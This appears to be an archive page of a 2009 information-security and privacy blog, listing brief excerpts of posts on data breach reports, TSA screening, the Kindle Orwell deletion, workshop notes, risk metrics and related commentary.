It was built to be impenetrable, from its “super rugged transparent polycarbonate housing” to its intricate double-tabbed lid… Just go read the story. Anything else I say will spoil the punchline.

 

Chris, I'm sorry

I hate the overuse of URL shortners like tinyurl. I like to be able to see what a link is before I click on it. I don’t like that these companies get to be yet another point of surveillance. (To be fair, tinyurl doesn’t seem to be taking advantage of that. I have cookies from […]

 

The Arrest of Gates

A couple of good articles are John McWhorter’s “Gates is Right–and We’re Not Post-Racial Until He’s Wrong,” and Lowry Heussler’s “Nightmare on Ware Street.” The full police report is at “Gates police report.” I think PHB’s comment on Michael Froomkin’s post is quite interesting: You are all missing a rather significant fact, this is the […]

 

Today's Privacy Loss – English Soldiers' Details Published

Demonstrating that no one’s data is safe, the names, pay records, and other personal information of 90,000 English soldiers was placed on the Internet. These soldiers, who served with king Henry V at Agincourt now have their information listed at www.medievalsoldier.org, exposing them to the chance of identity theft after nearly 500 years. They soldiers […]

 

For epistemological anarchism

So Dave Mortman and Alex Hutton have a talk submitted to Security BSides entitled “Challenging the Epistemological Anarchist to Escape our Dark Age.” Now, it would certainly be nice if we could all use the same words to mean the same things. It would make communication so much easier! It would let us build the […]

 

July 20, 1969

The Apollo program took place at just about the right time for me. I was six (or, as I would quickly have pointed out at the time, six *and a half*) when the first lunar landing occurred, and barely ten when Apollo 17 splashed down. This was old enough to be fascinated by the technology […]

 

Color on Chrome OS

New things resemble old things at first. Moreover, people interpret new things in terms of old things. Such it is with the new Google Chrome OS. Very little I’ve seen on it seems to understand it. The main stream of commentary is comparisons to Windows and how this means that Google is in the OS […]

 

We Regret The New York Times’ Error

In “Kindling a Consumer Revolt,” I quoted the New York Times: But no, apparently the publisher changed its mind about offering an electronic edition, and apparently Amazon, whose business lives and dies by publisher happiness, caved. It electronically deleted all books by this author from people’s Kindles and credited their accounts for the price.” What […]

 

Kindle Brouhaha Isn't About DRM

In case you haven’t heard about it, there is a brouhaha about Amazon un-selling copies of two Orwell books, 1984 and Animal Farm. There has been much hand-wringing, particularly since it’s deliciously amusing that that it’s Orwell. The root cause of the issue is that the version of the Orwell novels available on the Kindle […]

 

Kindling a Consumer Revolt

Well, by now it’s all over the blogo/twitter spheres, and everything that might be said has already been said about Eric Blair, a publisher and Amazon: This morning, hundreds of Amazon Kindle owners awoke to discover that books by a certain famous author had mysteriously disappeared from their e-book readers. These were books that they […]

 

Up Again

We had some expected downtime this morning. Thanks for your notes and IMs. If you’re reading this, things are now working again.

 
 

A Black Hat Sneak Preview (Part 2 of ?)

Following up on my previous post, here’s Part 2, “The Factors that Drive Probable Use”. This is the meat of our model. Follow up posts will dig deeper into Parts 1 and 2. At Black Hat we’ll be applying this model to the vulnerabilities that are going to be released at the show. But before […]

 

Not because it is easy, but because it is hard

Forty years ago today, Apollo 11 lifted off for the moon, carrying Buzz Aldrin, Neil Armstrong and Michael Collins. The Boston Globe has a great selection of photos, “Remembering Apollo 11.” (Thanks to Deb for the link.)

 

Happy Bastille Day!

It’s hard not to like a holiday which celebrates the storming of a prison and the end of a monarchy. Photo: Vytenis Benetis .

 

An Example of Our Previous Graph In Action

I wanted to throw it out here as an example of how you would the model from my earlier post in real life. So let’s take the recently released Internet Explorer security vulnerability and see how it fits. Now this is a pretty brain-dead example and hardly requires a special tool, but I think it […]

 

Do Audit Failures Mean That Audit Fails In General?

Iang’s posts are, as a rule, really thought provoking, and his latest series is no exception. In his most recent post, How many rotten apples will spoil the barrel, he asks: So we are somewhere in-between the extremes. Some good, some bad. The question then further develops into whether the ones that are good are […]

 

Wells Fargo vs Wells Fargo

You can’t expect a bank that is dumb enough to sue itself to know why it is suing itself. Yet I could not resist asking Wells Fargo Bank NA why it filed a civil complaint against itself in a mortgage foreclosure case in Hillsborough County, Fla. “Due to state foreclosure laws, lenders are obligated to […]

 

Running from the truth

Robin Hanson has an interesting article, “Desert Errors:” His findings stayed secret until 1947, when he was allowed to publish his pioneering Physiology of Man in the Desert. It went almost entirely unnoticed. In the late 1960s, marathon runners were still advised not to drink during races and until 1977, runners in international competitions were […]

 

Business Week on Heartland

Not much to add, but a good article in Business Week on Lessons from the Data Breach at Heartland. Well worth reading…

 

Social Security Numbers are Worthless as Authenticators

The nation’s Social Security numbering system has left millions of citizens vulnerable to privacy breaches, according to researchers at Carnegie Mellon University, who for the first time have used statistical techniques to predict Social Security numbers solely from an individual’s date and location of birth. The findings, published Monday in The Proceedings of the National […]

 

A Black Hat Sneak Preview (Part 1 of ?)

Alex and I will be on a panel, A Black Hat Vulnerability Risk Assessment, at this year’s Black Hat. We’ll be discussing the need to perform a risk assessment of vulnerabilities as you become aware of them in a deeper context then just looking at the CVSS scores. Things to consider are what compensating controls […]

 

Bob Blakely on the Cybersecurity Conversation

Bob Blakely has a thought-provoking blog post which starts: The Cyberspace Policy Review says “The national dialog on cyber-security must begin today.” I agree. Let’s start the dialog with a conversation about what sacrifices we’re willing to make to get to an acceptable worst-case performance. Here are four questions to get the ball rolling: Question […]

 

Thoughts on Iran

Our love affair with the Iranian Tweetolution has worn off. The thugs declared their election valid, told their armed representatives to Sorry, next tweet: go impose some law or order or something, and it was done. Well, as it often turns out, there was more to it than fits in 140 characters, and the real […]

 

The Punch Line Goes at the End

The Black Hat conference in Las Vegas always has its share of drama. This year, it’s happened a month before the conference opens. The researcher Barnaby Jack had to cancel his talk. Risky.biz gives an account of this; his talk was to make an Automated Teller Machine spit out a “jackpot” of cash, in the […]

 

Unthinkable Foolishness from TSA

“Flying from Los Angeles to New York for a signing at Jim Hanley’s Universe Wednesday (May 13th), I was flagged at the gate for ‘extra screening’. I was subjected to not one, but two invasive searches of my person and belongings. TSA agents then ‘discovered’ the script for Unthinkable #3. They sat and read the […]

 

Voltage Predicts the Future

It’s easy to critique the recent Voltage report on breaches. (For example, “2009 started out to be a good year for hackers; in the first three months alone, there were already 132 data breaches reported.” That there were 132 breaches does not mean that hackers are having a good year; most breaches are not caused […]

 

Thanks, Jeffrey Bennett

In “Books that should be in a security manager’s library,” Jeffrey Bennett says nice things about The New School (the book) and suggests that it’s one of eight that “no professional library is complete without.” Thanks!

 

Emergent Traffic Chaos

Paul Kedrosky has an amazing video: As described in the New Scientist: Researchers from several Japanese universities managed the feat by putting 22 vehicles on a 230-metre single-lane circuit (see video). They asked drivers to cruise steadily at 30 kilometres per hour, and at first the traffic moved freely. But small fluctuations soon appeared in […]

 

More Friday Skepticism

Since Adam started it, I’ll add a link to a nice YouTube video about how to be a good skeptic h/t BoingBoing

 

Death-related items

I’m cleaning out my pending link list with couple morbidly-thematic links. Old-but-interesting (2007 vintage) list of relative likelihoods of death compared to dying in a terrorist attack.  For example… You are 1048 times more likely to die from a car accident than from a terrorist attack You are 12 times more likely to die from […]

 

Visualization Friday & More!

OK, so this week for Visualization Friday, I’m going to point you to just one thing: At Last, a Scientific Approach to Infographics A blog post by the awesome visualization expert Stephen Few that praises: Visual Language for Designers: Principles for Creating Graphics that People Understand by Connie Malamed OK, I’ll also mention that I […]

 

Science, Skepticism and Security

Rich Mogull has a great post on “Science, Skepticism and Security” In the security industry we never lack for theories or statistics, but very few of them are based on sound scientific principles, and often they cannot withstand scientific scrutiny. For example, the historic claim that 70% of security attacks were from the “insider threat” […]

 

The Cost of Anything is the Foregone Alternative

The New York Times reports: At least six men suspected or convicted of crimes that threaten national security retained their federal aviation licenses, despite antiterrorism laws written after the attacks of Sept. 11, 2001, that required license revocation. Among them was a Libyan sentenced to 27 years in prison by a Scottish court for the […]

 

Economics of Information Security

Ross Anderson is liveblogging the 2009 Workshop on Economics of Information Security. I’m in Seattle, and thus following eagerly. It seems Bruce isn’t liveblogging this time. I know I found it challenging to be a stenographer and a participant at SHB.

 

The emergent chaos of fingerprinting at airports

HONG KONG (Reuters) – A Singapore cancer patient was held for four hours by immigration officials in the United States when they could not detect his fingerprints — which had apparently disappeared because of a drug he was taking. The incident, highlighted in the Annals of Oncology, was reported by the patient’s doctor, Tan Eng […]

 

UnClear where the data will go

So Clear’s Verified Line Jumper service has shut down. Aviation Week has a blog post, “ Clear Shuts Down Registered Traveler Lanes.” Clear collected a lot of data: The information that TSA requires us to request is full legal name, other names used, Social Security number (optional), citizenship, Alien Registration Number (if applicable), current home […]

 

Iran Links

The Economist’s Bagehot writes about his idea of “The chemistry of revolution,” while admitting he’s generalizing from two. Ethan Zuckerman on “Iran, citizen media and media attention.” “Unfortunately, unlike positive online gestures of solidarity (retweeting reports from Iran, turning Twitter or Facebook pictures green), this one does little more than piss off sysadmins, helps Iranian […]

 

Ron Paul supporter inadvertently gets iPhones banned from U.S. aircraft

Via CNN: Steve Bierfeldt says the Transportation Security Administration pulled him aside for extra questioning in March. He was carrying a pocket edition of the U.S. Constitution and an iPhone capable of making audio recordings. And he used them. On a recording a TSA agent can be heard berating Bierfeldt. One sample: “You want to […]

 

Visualization Friday!

Yesterday I got to see what might have been one of the most amazing(ly bad) security dashboards I’ve ever seen.  And those who have read my posts on visualization know that I find the visualization of risk & security to be a pretty fascinating field of study.  So given the quality of the GRC apps […]

 

Happy Juneteenth!

Celebrate Juneteenth, but remember that we have not eliminated the scrouge of slavery.

 

The Trouble With Metrics

Is that they can be gamed. See “ Terror law used to stop thousands ‘just to balance racial statistics’” in the Guardian: Thousands of people are being stopped and searched by the police under their counter-­terrorism powers – simply to ­provide a racial balance in official statistics, the government’s official anti-terror law watchdog has revealed. […]

 

Privacy Enhancing Technologies 2009

The organizers of the 9th Privacy Enhancing Technologies Symposium invite you to participate in PETS 2009, to be held at the University of Washington, Seattle, WA, USA, on Aug 5-7, 2009. PETS features leading research in a broad array of topics, with sessions on network privacy, database privacy, anonymous communication, privacy policies, and privacy offline. […]

 

Green Dam

Update 26 June 2009: The status of Green Dam’s optionality is still up in the air.  See, for example, this news story on PC makers’ efforts to comply, which points out that Under the order, which was given to manufacturers in May and publicly released in early June, producers are required to pre-install Green Dam […]

 

SHB Session 6: Terror

Bill Burns (Suggested reading Decision Research: The Diffusion of Fear: Modeling Community Response to a Terrorist Strike) Response to Crisis: Perceptions, Emotions and Behaviors. Examining a set of scenarios of threats in downtown LA. Earthquake, chlorine release, dirty bomb. Earthquake: likely 100-200 casualties. Dirty bomb, expected casualties: 100 at most. Chlorine may be thousands to […]

 

SHB Session 5: Foundations

Rachel Greenstadt chaired. I’m going to try to be a little less literal in my capture, and a little more interpretive. My comments in italic. Terence Taylor, ICLS (Suggested reading: Darwinian Security; Natural Security (A Darwinian Approach to a Dangerous World)). Thinks about living with risks, rather than managing them. There are lessons from biology, […]

 

SHB Session 4: Methodology

David Livingstone Smith chaired. Angela Sasse “If you only remember one thing: write down everything the user needs to do and then write down everything the user needs to know to make the system work. Results of failure are large, hard to measure. (Errors, frustration, annoyance, impact on processes and performance, coloring user perception of […]

 

SHB Session 3: Usability

Caspar Bowden chaired session 3, on usability. Andrew Patrick NRC Canada (until Tuesday), spoke about there being two users of biometric systems: the purchaser or system operator and the subject. Argues that biometrics are being rolled out without a lot of thought for why they’re being used, when they make sense and when not. Canada […]

 

Publius Outed

The pseudonymous blogger, Publius, has been outed. Ed Whelan of the National Review outed him in what appears to be nothing more than a fit of pique at a third blogger, Ed Volokh, and Publius commented on Volokh’s criticism of Whelen, so Whelen lashed out at Publius. Or so it seems from the nosebleed bleachers […]

 

SHB Session 2: Fraud

Julie Downs studied users who were going through an email inbox full of phishing emails, while doing a talk-aloud. They also did interviews afterwards. People with incidents get very sensitive to risks, but don’t get any better at identifying phishing emails. What really helps is contextualized understanding. Do they know what a URL is? Do […]

 

SHB Session 1: Deception

Frank Stajano Understanding Victims Six principles for systems security Real systems don’t follow logic that we think about. Fraudsters understand victims really well. Working with UK TV show, “the real hustle.” Draft paper on SHB site. Principles: Distraction, social compliance, herd principle, decption, greed, dishonesty David Livingstone Smith What are we talking about? Theoretical definitions: […]

 

Security & Human Behavior

I’m at the Security & Human Behavior workshop, and will be trying to blog notes as we go. I should be clear: these notes aren’t intended to be perfect or complete. Update: Bruce Schneier is also liveblogging. intro. Ross Anderson is blogging in comments to this post.

 

Security & Human Behavior

I’m blogging the Security & Human Behavior Workshop at the New School blog. Bruce Schneier is also blogging it, as is Ross Anderson.

 

A Farewell to Bernstein

From Chandler, who is in China: Adam sent along to the authors of this blog a link to the http://www.nytimes.com/2009/06/08/business/08bernstein.html?_r=1&hpw New York Times obituary for Peter Bernstein yesterday Peter L. Bernstein, an economic historian and a widely read popularizer of the efficient market theory, which changed trading behavior on Wall Street, died Friday at NewYork-Presbyterian/Weill […]

 

Pirate Party Victory in Sweden

“Together, we have today changed the landscape of European politics. No matter how this night ends, we have changed it,” Falkvinge said. “This feels wonderful. The citizens have understood it’s time to make a difference. The older politicians have taken apart young peoples’ lifestyle, bit by bit. We do not accept that the authorities’ mass-surveillance,” […]

 

Links To Interesting Stuff

I have a ton of tabs open in Firefox about stuff I thought would be some sweet newschool-esque reading for everybody out there. 1.) Threat and Risk Mapping Analysis in Sudan Not really about measurement and progress, but a fascinating look at “physical risk management” nonetheless: http://irevolution.wordpress.com/2009/04/09/threat-and-risk-mapping-analysis-in-sudan/ 2.)  I thought Gunnar did a great job […]

 

S&P Risk Models

There was an interesting segement on NPR this morning, “Economy Got You Down? Many Blame Rating Firms” that covered amongst other things the risk model that Standard and Poors used to rate bonds and in specific mortgage backed ones. There are a few choice quotes in the story about how the organizations approached the models […]

 

The Art of Living Dangerously

I haven’t had a chance to read it, but I’ll probably pick up “Absinthe and Flamethrowers: Projects and Ruminations on the Art of Living Dangerously” at some point, if only because of the author’s writing on the relationship between risk and happiness says something I’ve always suspected, that risk takers are happier than risk avoiders […]

 

Pirates, Inc.

I found this short documentary about piracy around the Straits of Malaca to be an interesting view of the reality of pirate life as a last refuge of the unemployed fisherman to be an interesting counterpoint to the NPR Story, “Behind the Business Plan of Pirates, Inc.” which provides an altogether different view of the […]

 

Statistics Police?!

From Gelman’s blog: U.K. Sheriff Cites Officials for Serious Statistical Violations I don’t know if we need an “office” of information assurance in the government sector, but it would be nice to have some penalty on the books for folks who abuse basic common sense statistical principles. Of course, the *real* answer lies in education […]

 

TAKE PART IN PROJECT QUANT (please)!

Hey everyone.  I wanted to let you know that Rich, Adrian & Co. at Securosis are spearheading a research project  called “Quant”.  They currently have a survey up on survey monkey about Patch Management that they’d like participation in.  If you can, please give thoughtful contribution to the survey. http://www.surveymonkey.com/s.aspx?sm=SjehgbiAl3mR_2b1gauMibQw_3d_3d There’s something about a registration […]

 

Amusements with Alpha

I just saw a link to someone who had broken Wolfram Alpha. Their breaking question was, “when is 5 trillion days from now?” The broken result is: {DateString[{13689537044,5,13,16,57,18.5796},Hour12Short],:,DateString[{13689537044,5,13,16,57,18.5796},Minute],:,DateString[{13689537044,5,13,16,57,18.5796},Second], ,DateString[{13689537044,5,13,16,57,18.5796},AMPMLowerCase]} | {DateString[{13689537044,5,13,16,57,18.5796},DayName],, ,DateString[{13689537044,5,13,16,57,18.5796},MonthName], ,DateString[{13689537044,5,13,16,57,18.5796},DayShort],, ,13689537044} Which is certainly amusing. A quick check shows that even one trillion days gives a similar error. A bit of the […]

 

New Means of Pie Chart Abuse

Just for Adam, because I know he’ll *love* this. Was reading the “How to transform your ETL tool into a data quality toolkit” post on the data quality blog when I noticed something. In the graphic they’re presenting there: The.Pie.Chart.Spins. Which could be one of the most awesome data visualization abuses.  ever.

 

Voltage Security's Breach Map

The folks over at Voltage have released a really cool interactive map of breaches from around the world.  Tools like this show how important having data is, just imagine how much more impressive and useful something like this could be if more people were willing to share data about breaches or other information security issues […]

 

Open Thread

What’s on your mind? Extra points for mocking other members of the combo for not posting. Me? I’m wondering why the opening of the Parliament of South Africa involves so many bagpipes.

 

Thoughts on Bejtlich's Information Security Incident Ratings

Check out Richard Bejtlich’s Information Security Incident Rating post. In it, he establishes qualitative, color-based scales for various asset-states in relation to the aggregate threat community.  As Richard states, he’s not modeling risk, but rather he’s somewhat modeling half of risk (in FAIR terms, an attempt at TEF/LEF/TCap information, just not the loss magnitude side). […]

 

Democracy, Gunpowder, Literacy and Privacy

In an important sense, privacy is a modern invention. Medieval people had no concept of privacy. They also had no actual privacy. Nobody was ever alone. No ordinary person had private space. Houses were tiny and crowded. Everyone was embedded in a face-to-face community. Privacy, as idea and reality, is the creation of a modern […]

 

TSA Kills Bad Program!

The government is scrapping a post-Sept. 11, 2001, airport screening program because the machines did not operate as intended and cost too much to maintain. The so-called puffer machines were deployed to airports in 2004 to screen randomly selected passengers for bombs after they cleared the standard metal detectors. The machines take 17 seconds to […]

 

Web 2.0 and the Federal Government

This looks interesting, especially in light of the launch of data.gov: The Obama campaign—and now the Obama administration—blazed new trail in the use of Web 2.0 technology, featuring videos, social networking tools, and new forms of participatory and interactive technology. This event will feature government, technology, and new media leaders in addressing the special challenges […]

 

Giving Circles and de Tocqueville

There was an interesting story on NPR the other day about “giving circles.” It’s about groups of people getting together, pooling their money, investigating charities together, and then giving money. The story mentions how the increasing bureaucratization* of fund-raising leads to groups whose involvement is “I write them a cheque each year.” It also mentions […]

 

Secret Questions

Congratulations to Stuart Schechter, A. J. Bernheim Brush (Microsoft Research), Serge Egelman (Carnegie Mellon University). Their paper, “It’s No Secret. Measuring the Security and Reliability of Authentication via ‘Secret’ Questions” has been Slashdotted. It’s really good research, which Rob Lemos covered in “Are Your “Secret Questions” Too Easily Answered?”

 

Can't Win? Re-define losing the TSA Way!

We were surprised last week to see that the GAO has issued a report certifying that, “As of April 2009, TSA had generally achieved 9 of the 10 statutory conditions related to the development of the Secure Flight program and had conditionally achieved 1 condition (TSA had defined plans, but had not completed all activities […]

 

Definitions: cloudenfreude

cloudenfreude — Feeling of happiness at watching the discomfort of others, especially senior management, as they accept in aggregate for *aaS the same risks which were easily accepted piecemeal over time for the analgous service internally.

 

First International Alternative Workshop on Aggressive Computing and Security

Thinking security can not be done without adopting a preferential mode of thought of the attacker. A system cannot be defended if we do not know how to attack it. If the theory is still an interesting approach to formalize things, the operational approach must be the ultimate goal: to talk about security is meaningless […]

 

PCI Data Available

Interesting information was made available today from VISA about PCI Compliance status for Level 1, 2, and 3 merchants.  Find it as a .pdf >>here<< (thanks to Mike Dahn for bringing it to our notice). **UPDATE** You may want to check out what Pete Lindstrom has done with that data, in his Blog Post, “Is […]

 

Richard Bejtlich's Quantum State

Is Statistically Mixed? Richard Bejtlich (whom I do admire greatly in most all of his work) just dug up a dead horse and started beating it with the shovel, and I just happen to have this baseball bat in my hands, and we seem to be entangled together on this subject, so here goes: I […]

 

Twitter Bankruptcy and Twitterfail

If you’re not familiar with the term email bankruptcy, it’s admitting publicly that you can’t handle your email, and people should just send it to you again. A few weeks ago, I had to declare twitter bankruptcy. It just became too, too much. I’ve been meaning to blog about it since, but things have just […]

 

European View on Breaches

I hadn’t seen this article by Peter Hustinix when it came out, but it’s important. He says that “All data breaches must be made public:” The good news is that Europe’s lawmakers want to make it obligatory to disclose data breaches. The bad news is that the law will not apply to everyone. Those exemptions […]

 

I wrote code for a botnet today

There’s a piece of software out there trying to cut down on blog spam, and it behaves annoyingly badly. It’s bad in a particular way that drives me up the wall. It prevents reasonable behavior, and barely blocks bad behavior of spammers. In particular, it stops all requests that lack an HTTP Referer: header. All […]

 

Camera advice bleg

I’m thinking about maybe getting a new camera. Before I say anything else let me say that I understand that sensor size and lens rule all else, and that size does matter, except when it’s megapixel count, which is a glamour for the foolish. That said, I’m off to South Africa in a few weeks, […]

 

The Eyes of Texas Are on Baseboard Management Controllers? WHAT??!!!

OR TEXAS HB1830S IS SWINEFLU LEGISLATION, IT’S BEEN INFECTED BY PORK! **UPDATE:  It looks like the “vendor language” around Section Six has been struck! Given Bejtlich’s recent promises, I thought we’d take a quick but pragmatic look at why risk assessments, even dumb, back-of-the-envelope assessments, might just be a beneficial thing. As you probably know, […]

 

Ban Whole Body Imaging

Congressman Jason Chaffetz has introduced legislation seeking a ban on Whole-Body Imaging machines installed by the Transportation Security Administration in various airports across America. Describing the method as unnecessary to securing an airplane, Congressman Chaffetz stated that the new law was to “balance the dual virtues of safety and privacy.” The TSA recently announced plans […]

 

Seattle Parking Monitoring

Seattle’s King5 TV reports on “Parking enforcement’s powerful new weapon:” An unassuming white sedan is the Seattle Police Department’s new weapon against parking violators. Just by driving down the street, George Murray, supervisor of SPD’s parking enforcement unit, can make a record of every parked car he passes. “What we’re doing here is we’re actually […]

 

Time To Patch, Patch Significance, & Types of Cloud Computing

Recently, a quote from Qualys CTO Wolfgang Kandek struck me kind of weird when I was reading Chris Hoff yet again push our hot buttons on cloud definitions and the concepts of information security survivability.  Wolfgang says (and IIRC, this was presented at Jericho in SF a couple of weeks ago, too): In five years, […]

 

Covering the Verizon Breach Report

As you probably know by now, the pattern of 1s and 0s on the cover of the 2009 Verizon Data Breach Investigations Report contains a hidden message. I decided to give it a whirl and eventually figured it out. No doubt plenty of people managed to beat me to it, as evidenced by the fact […]

 

Cybersecurity Review Turf Battle

Many at RSA commented on the lack of content in Melissa Hathaway’s RSA keynote. The Wall St Journal has an interesting article which may explain why, “Cybersecurity Review Sets Turf Battle:” President Barack Obama’s cybersecurity review has ignited turf battles inside the White House, with economic adviser Lawrence Summers weighing in to prevent what he […]

 

Scalia: Just Because You Can Doesn't Mean You Should

aka it’s not nearly as funny when you are the subject of the probe. At a recent conference Justice Scalia said “”Every single datum about my life is private? That’s silly,” Well, a professor at Fordham University decided to take Mr Scalia at his word, and had one of his classes collect a dossier on […]

 

"No Evidence" and Breach Notice

According to ZDNet, “Coleman donor data breached in January, but donors alerted by Wikileaks not campaign:” Donors to Minnesota Senator Norm Coleman’s campaign got a rude awakening this week, thanks to an email from Wikileaks. Coleman’s campaign was keeping donor information in an unprotected database that contained names, addresses, emails, credit card numbers and those […]

 

"No Evidence" and Breach Notice

According to ZDNet, “Coleman donor data breached in January, but donors alerted by Wikileaks not campaign:” Donors to Minnesota Senator Norm Coleman’s campaign got a rude awakening this week, thanks to an email from Wikileaks. Coleman’s campaign was keeping donor information in an unprotected database that contained names, addresses, emails, credit card numbers and those […]

 

@Mortman MP3d on Threat Post

I’ll go ahead and promote David.  He’s interviewed over at Threat Post.  Pod/Talk cast it up! In this episode of the Digital Underground podcast, Dennis Fisher talks with David Mortman, CSO-in-residence at Echelon One and longtime security executive, about whether we’ve become too reliant on compliance, the changing nature of the CSO’s job and how […]

 

Security is about outcomes: RSA edition

So last week I asked what people wanted to get out of RSA, and the answer was mostly silence and snark. There are some good summaries of RSA at securosis and Stiennon’s network world blog, so I won’t try to do that. But I did I promise to tell you what I wanted to get […]

 

More breach visualization

I received some excellent comments on my previous breach visualization post, which I wanted to highlight for EC readers and take a stab at addressing.

 

Breach Visualization

I took the latest DataLossDB.org breach database and extracted all breaches involving a third party, omitting all columns other than the reporting entity and the third party. I then ran the resulting two-column CSV file through afterglow, and finally made pretty (3MB) picture with graphviz. This was done more for fun than for insight, but […]

 

Little Bobby Drop tables

In 1999 Syse Data was converted to a limited liability company, and has since been trading under the name Syse Data AS[1]. As the names are so similar, searches for our company in the official Norwegian registry of just-about-anything (Brønnøysundregistrene) often resulted in potential customers looking up the wrong company. To prevent this confusion we […]

 

Dept. of Pre-Blogging: Swine Flu edition

In no particular order, your friendly neighborhood Dept. of Pre-blogging hereby predictively reports on: Increased speculation, coupled with a spike in Twitter activity. Politicization of the event from the Right (blame Mexico and/or Big Government), the Left (if we spent money in the right places, this would not happen), and out in left field (this […]

 

Congratulations, Open Security Foundation

The Open Security Foundation, creators of OSVDB and DataLossDB have won SC Magazine’s Editor’s Choice award for 2009. It’s well deserved. In other Open Security Foundation News, about a dozen people asked me how to get a stylin’ DataLossDB t-shirt. It’s pretty easy-donate. I think you get one at the $100 level.

 

Congratulations to the Social Security Blog award winners!

A huge congratulations to the winners of the Social Security Awards [on Wednesday] PaulDotCom won the Best Podcast Award, the crew at the SANS Internet Storm Center won the best Technical Blog award, the best Non-Technical Blog went to Richard Bejtlich of the TaoSecurity Blog, Sunbelt Security won the Best Corporate Blog and Mike Rothman […]

 

Registration now open for WEIS 2009

Registration for The Eighth Workshop on the Economics of Information Security (WEIS 2009) is now open. The deadline for the Early Bird registration is 1 June 2009. We’ve written here often (and favorably) about WEIS, and about papers delivered there.

 

Standing Still

Following up on Ben’s comment to s/green/secure/g, infosec generally makes life /harder/ for people (at least in the short-term), all to keep bad things from happening. I’ll argue it’s even worse than that. Since “secure” is neither achievable nor a static state, it can never be done and standing still means falling behind.  One of […]

 

s/green/secure/g

Don’t miss this fascinating article in the New York Times, “Why Isn’t the Brain Green?” You can read it for itself, but then you hit paragraphs like this: It isn’t immediately obvious why such studies are necessary or even valuable. Indeed, in the United States scientific community, where nearly all dollars for climate investigation are […]

 

Breach Notification Law Across the World

“Data Breach Noti?cation Law Across the World from California to Australia” by Alana Maurushat. From the abstract: The following article and table examine the specifics of data breach notification frameworks in multiple jurisdictions. Over the year of 2008, Alana Maurushat of the Cyberspace Law and Policy Centre, with research assistance from David Vaile and student […]

 

Who should be punished for torture?

Normally, I try to post funny bits over the weekend, but I can’t let this week’s news slip by. I have deeply mixed feelings about how to handle those who tortured. On the one hand, they were only following orders. On the other hand, they were following orders which clearly required contortions to see as […]

 

Project Quant: Patch Management Metrics

Rich Mogull, Adrian Lane, (of Securosis) and Jeff Jones (of Microsoft) have started a “transparent” metrics project “to help build an independent model to measure the costs and effectiveness of patch management.”  They’re calling it (for now) Project Quant.  As you can probably guess, I’m all for transparent metrics projects, and I hope you’ll at […]

 

Off to the Moscone Center

Every year around this time, thousands of people converge on the Moscone Center in San Francisco for RSA. I had never given much thought to who Moscone was–some local politician I figured. I first heard about Harvey Milk in the context of the Dead Kennedys cover of I Fought The Law: The law don’t mean […]

 

Evolution of Information Analysis

Real briefly, something that came to me reading Marcus Ranum over at Tenable’s Blog. Marcus writes: Usually, when I attack pseudo-science in computer security, someone replies, “Yes, but some data is better than none at all!”  Absolutely not true! Deceptive, inaccurate, and misleading data is worse than none at all, because it can encourage you […]

 

Black Swan-Proof InfoSec?

I came across an interesting take on Nassim Taleb’s “Black Swan” article for the Financial Times via JP Rangaswami‘s blog “Confused in Calcutta“.   Friends and folks who know me are probably tired of my rants about what I think of Taleb’s work and what I think he’s gotten wrong.  But really, I find his FT […]

 

A Curmudgeon is a Little Confused by the 2009 DBIR

I’ve given Vz’s DBIR a quick perusal.  The data are interesting indeed and the recommendations are obvious.  There is little new here in the way of recommendations – I guess nobody is listening or the controls are ineffective (or a bit of both). Regardless, I have a few items that confuse and irritate me a […]

 

Breaches Conference audio online

Back in March, the Berkeley Center for Law and Technology put on a great conference, the “Security Breach Notification Symposium.” It was a fascinating day, and the audio is now online.

 

Initial Thoughts on the 2009 Verizon DBIR

Last night, the fine folks at Verizon posted the 2009 version of the DBIR.  I haven’t had time to do a full deep dive yet, but I thought I’d share my initial notes in the meantime. Stuff in italics is from the DBIR, regular text is me: 81 percent of organizations subject to PCI DSS […]

 

How to be Cyberscary

The intersection of cime and technology is a fascinating place.  Innovation of fraud, theft, and industrial espionage is occurring at a phenomenal pace and is producing no shortage of real problems that Information Risk and Security professionals need to be learning about and addressing.  Unfortunately, the noise coming from journalists in this space is so […]

 

Events don't happen in a Vacuum

Several commenters on yesterday’s post brought up the excellent point that its hard to talk about outcomes when you think you haven’t had any incidents. (“Consider the bank that had no attempted robberies this year”) Are you right? With a bank, it’s pretty easy to see most robberies. What’s more, we have the FBI showing […]

 

The New School Blog

I’m really excited to announce NewSchoolSecurity.com, the blog inspired by the book. I’ll be blogging with Alex Hutton, Chandler Howell and Brooke Paul. And who knows, maybe we’ll even get a post or two from Andrew? Emergent Chaos will continue. My posts here will be a little more on the privacy, liberty and economics end […]

 

Security is about outcomes, not about process

In some migration or another, this post was duplicated; the real post is at https://adam.shostack.org/blog/2009/04/security-is-about-outcomes-not-about-process/. Editing to avoid linkrot

 

Security is about outcomes, not about process

Nearly a decade ago Bruce Schneier wrote “Security is a process, not a product.” His statement helped us advance as a profession, but with the benefit of hindsight, we can see he’s only half right. Security isn’t about technology. Security is about outcomes, and our perceptions, beliefs and assurance about those outcomes. Here’s a quick […]

 

Microsoft Security Intelligence Report

The Microsoft SIR was released 4/8 and is available for download here.  Some of the interesting stuff they put in graphs is from the Open Security Foundation’s OSF Data Loss Database (http://datalossdb.org).  Among the interesting things in the Microsoft SIR: Good old theft and losing equipment, when combined, still beats the sexier categories hands down. […]

 

Flinging Money Around Never Works

Freeway Drivers Grab Money as Suspects Toss Thousands During Police Chase:” Thousands of dollars worth of hundred dollar bills brought rush hour to an abrupt halt on two San Diego freeways. Drug suspects tossed the money from their car as they were chased by police. Other drivers saw the money and stopped their cars on […]

 

New School Bloggers Speaking Today

So I apologize for short notice.  Hopefully the webmaster will get in gear and put up an event calendar or something, but here are a couple of events you might want to attend today that New School Bloggers are speaking at. First, David Mortman is giving “The Mortman Briefing:  Metrics for the Real World”over at […]

 

Cyber-Spies!

The WSJ has an article up today about how the Russians and Chinese are mapping the US electirical grid.  What I thought was more interesting was the graph they used (which is only mildly related to the article itself). If I’m reading this correctly, the DHS is claiming that there were just under 70,000 breaches […]

 

Hello World?

Thanks for stopping by The New School of Information Security Blog.  We’re very “beta” right now, and anticipate having everything ready by the RSA conference (the week of the 17th).  If you’d like to see some recent content by our authors, I had a recent post on the Verizon/Cybertrust blog about the PCI DSS and […]

 

Building Security In, Maturely

While I was running around between the Berkeley Data Breaches conference and SOURCE Boston, Gary McGraw and Brian Chess were releasing the Building Security In Maturity Model. Lots has been said, so I’d just like to quote one little bit: One could build a maturity model for software security theoretically (by pondering what organizations should […]

 

Deadline extended: Computers, Freedom & Privacy Research Showcase

